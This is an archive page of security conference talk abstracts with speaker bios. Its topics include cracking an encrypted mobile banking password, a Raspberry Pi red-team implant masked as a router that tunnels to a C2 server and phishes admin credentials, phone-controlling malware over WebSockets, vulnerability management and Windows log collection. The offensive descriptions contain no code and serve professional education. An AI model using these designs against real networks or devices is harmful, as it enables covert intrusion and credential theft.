Archive for the talks Category

Level: Technical

Abstract:

Mobile applications store all possible data. There are different ways to store critical data. Developers often realize the importance of encryption of the critical data themselves. However, many times things go wrong despite security checks. In an anonymous practice example, we will crack an encrypted password to access a mobile bank. We will need to prepare our own code for this because, with classic hacking tools, this is not possible.

Bio:

From the very beginning of his professional career, Grega Prešeren has been conducting security audits and penetration tests. Since 2010, he has managed and conducted over 100 security audits of networks, IT services, web, mobile and other applications, industrial systems, etc. In 2015 and 2016, he was a major member of the security team at S&T. Since 2017, he has been working as a cyber security manager at Iskratel and as an Ethical hacker at the co-founded company CARBONSEC d.o.o.

Level: Technical

Abstract:

In this presentation, I will show you how I made a portable gadget suitable for red teamers. The gadget is more or less plug and play type, which is put in a unique custom-made enclosure. The main component of gadget is Raspberry Pi 3, which has an option to be powered over battery or power adapter, connected to the network over Ethernet cable or Wi-Fi. As soon as it is connected, it automatically creates an encrypted tunnel connection (SSH/TLS) over port 443 to the C2 server. I will also explain why SSH/SSL connection was preferred to TCP or SSH protocol. As soon as the connection is obtained, penetration testing could be performed remotely, from any part of the world. In addition, to avoid easy detection in an attacked network, I decided to mask Raspberry Pi into a different type of equipment. In my case, I did my best to mask it into a router. I spoofed MAC address into address of the router, SSH protocol version was hidden, fake router settings login page was created, which looks like a real one, and apache service name was changed into router’s one. At the end, when you compare the scan results with a real router, it almost looks identical. In addition, this page is also a phishing page, which waits for naive admin to try to login into router settings. As soon as login is attempted, its harvested credentials are sent over the email. The gadget also includes Wi-Fi access point, so you can connect and control it over phone or PC. It is very suitable if you try to infiltrate the gadget over Wi-Fi network, and you do not have its network Wi-Fi password in advance, so you can add it during the on-site visit.

Bio:

Boško Banjac is a 35-year-old engineer of chemistry technology from Slovenia, working in the pharmaceutical industry. For years his biggest passion has been hacking, which he does for a hobby. In a hacking field, he is focusing on hacking gadgets, network hacking, creating malware and coding tools/scripts.

Blog:

https://prohackerland.com

Level: Technical

Abstract:

In this presentation, I will show how infrastructural Vulnerability Management looks from the point of view of:

  • Information Security theorists
  • Vulnerability Management vendors
  • IT and IT Security guys in particular organizations

I will share my opinion on the vulnerability management process, which should include controls for:

  • Critical Networks and Assets
  • Local Admin credentials
  • Installation of Software (especially of Security Agents)
  • Compliance and asset configuration

Full description:

Historically, the infrastructural Vulnerability Management is understood primarily as a process of detecting and fixing (patching) known software bugs that theoretically can be used in attacks on organizations. Documents written by information security theorists from NIST, PCI, CIS, mainly contain formal recommendations: if your VM solution detects a vulnerability with a high enough CVSS base score, then such vulnerability must be fixed in a certain time. Vulnerability Management vendors share a similar position. They offer solutions that detect hundreds and thousands of vulnerabilities using some formal criteria, and they are not really interested in how these vulnerabilities will be fixed in real organizations. Only now they began to propose approaches such as Predictive Prioritization, which can (with some probability) filter out the most critical and exploitable vulnerabilities from the overall set.

In a real organization, the implementation of a VM process will cause a negative attitude from IT. Constantly updating infrastructure requires a lot of resources. For example, critical Linux kernel vulnerabilities appear every week. And usually IT departments are not ready for this. The problem could be solved through the automation of update processes. But for this, it is necessary to perform advanced automatic testing procedures after each update (especially for applications), which is also often impossible to implement. As a result, the VM process will either be sabotaged by IT (there are many ways to do this) or limited to a very small scope. In the second case, compensatory measures and justifications of why this or that vulnerability is not critical will be actively used. Which, of course, distorts the very idea of VM.

This is often facilitated by the fact that information security practitioners do not see a real danger in most of the existing vulnerabilities, in all but those that can be simply exploited by attackers in the organization (for example, EternalBlue, vulnerabilities in rdp, ssh, etc.). Such vulnerabilities usually become widely known and their patching does not require a regular process and can be performed as one-time events. At the same time, in every large organization, there are tasks that require control and automation even more critical than control of patch management. And they should be the basis of the practical and advanced Vulnerability Management process (since they directly affect the potential attack):

  • If we do not know and do not control some hosts, especially those accessible from the Internet, this is a vulnerability.
  • If we see that some Security Agents are not installed or configured on the hosts (in accordance to the policies), this is a vulnerability.
  • If we have unknown accounts on servers or users with unnecessary local admin permissions on the desktops, this is a vulnerability.
  • If there are hosts with installed software that is not necessary for work – this is a vulnerability. This also includes control over software updates and OS patching, but only as a subtask.
  • If the host is not configured in accordance with security requirements – this is a vulnerability.

And much more, leaving aside control over abnormal host activity (SOC tasks) and control over internal development (AppSec tasks).

Regarding the control over updates, I recommend to show the problem (a lot of hosts with critical vulnerabilities) and develop a policy for the organization based on this: take the risks, patch some particular vulnerabilities, change the patch management and application testing process, etc.

Bio:

Alexander Leonov is an Information Security Automation specialist with 10 years of experience in Vulnerability Management: from creating security content for Vulnerability Scanners to practical implementations of VM processes in the organizations.

Blog:

https://avleonov.com/

Level: Technical

Abstract:

Collecting Windows event logs and centralizing them into a Security Information and Event Management (SIEM) has always been a big challenge for managed security service providers (MSSPs) or companies taking care of their system security. Despite the multiple approaches – agent, agentless or hybrid – the landscape remains unclear, and it is hard to find a proper technical solution that takes care of the security constraints imposed by the environment (Active Directory domain in enterprise or Workgroup in OT).

In this talk, we will share how we improved the built-in Windows Event Forwarding (WEF) and Windows Event Collector (WEC) by providing a “crafted toolkit”. Next, new and alternative methods to collect Windows Server DNS logs will be presented. Finally, we discuss how such solutions can help MSSPs or companies to leverage Windows logs and to provide valuable IOCs for threat detection purposes.

Full description:

The Windows Event Forwarding (WEF) feature implemented on all recent Windows OS provides the ability to forward Windows logs to a central Windows collector in agent less mode. For that, the free Windows Event Collector role can be used in order to centralize all logs.

However, WEC server builtin capacities in terms of collection are very low and it’s hard to keep track of what is being collected or not. Moreover, there is no automated tool to scale up the deployment and manage advanced subscriptions which defines which IOCs/Event IDs to collect.

With this presentation, I would like to:

  • share a technical approach (initially introduced by Palantir) that we use to collect logs from all endpoints together with the WEC sserver
  • share a PowerShell tool that enhance the WEC server deployment together with the Palantir toolset
  • introduce new technical solution to collect Windows DNS logs with ETL format or ETW channel in order to move away from the former TXT files
  • provide technical architecture solutions to collect DNS logs in ETL-ETW format with agent (Splunk, NXLog) or without any agent (remote pull).
  • provide an overview of all possible log collection methods for most of Microsoft products (SQL Server, Exchange, IIS, PowerShell transcript/TXT, SYSMON, Windows Defender, Microsoft ATA, NPS radius, …).

My own project and tools can be found here: https://github.com/mdecrevoisier/windows-event-collector_auto-deploy

Palantir initial project can be found here: https://github.com/palantir/windows-event-forwarding 

Bio:

Michel de Crevoisier is a Security Analyst in the Data Analytics department at Radar Cyber Security in Vienna. Since he joined the company in 2017, he works on improving the data log collection from Microsoft environments in fields like “Information Technology” (IT) and “Public clouds”. Furthermore, he works on the detection of valuable IOCs to provide advanced use cases for threat detection. During his professional career, he handled several positions as a system and network administrator as well as a security architect in France, Spain and Austria. In addition to his practice, Michel regularly participates as a speaker on security conference (Swiss Cyber Storm 2019) and data protection conferences at the French embassy in Vienna and other business events organized by the French-Austrian chamber of commerce. Michel graduated with an MSc in computer sciences. During his studies, he was named by Microsoft as a “Student Partner” (MSP) and was in charge of organizing different talks and conferences in order to present the Microsoft ecosystem and its related services or products. At that time, he published several articles on his blog regarding security hardening and well-known threats like Mimikatz.

Blog:

https://fr.scribd.com/user/57371866/Michel-de-CREVOISIER/uploads

Level: Low Tech

Abstract:

We live in a world where we are not safe! If we forget our devices unlocked, any person can install anything and control it through the internet. Attendees will see how I built a Malware which can control cell phone devices using WebSockets from any place of the world. They will also learn techniques for preventing this kind of application and attack.

We’ll take a look at the following topics:

  • What is malware?
  • Communication Protocols
  • How to build any application with no previous knowledge
  • Real applications I built using Operating System’s APIs

In this talk, I’ll show a few applications I built showing practices of Offensive Programming techniques. These applications are created for fun but would be used for real scenarios and tips for preventing security problems.

Bio:

Erick Wendel is a Keynote Speaker, Lead Software Architect and community Co-organizer in Brazil. Named by Microsoft as Most Valuable Professional, and by Google as Google Developer Expert, a specialist in Node.js and Javascript Applications. He is an Independent Solutions Architect who helps companies to make better and cheaper applications using Serverless architectures, Container-based applications, and Hybrid Cloud solutions. He has experience speaking and teaching at the biggest conferences in Brazil and the Americas, working as voluntary Leader of NodeBR, Javascript São Paulo and Nerdzão Communities.

Blog:

https://erickwendel.com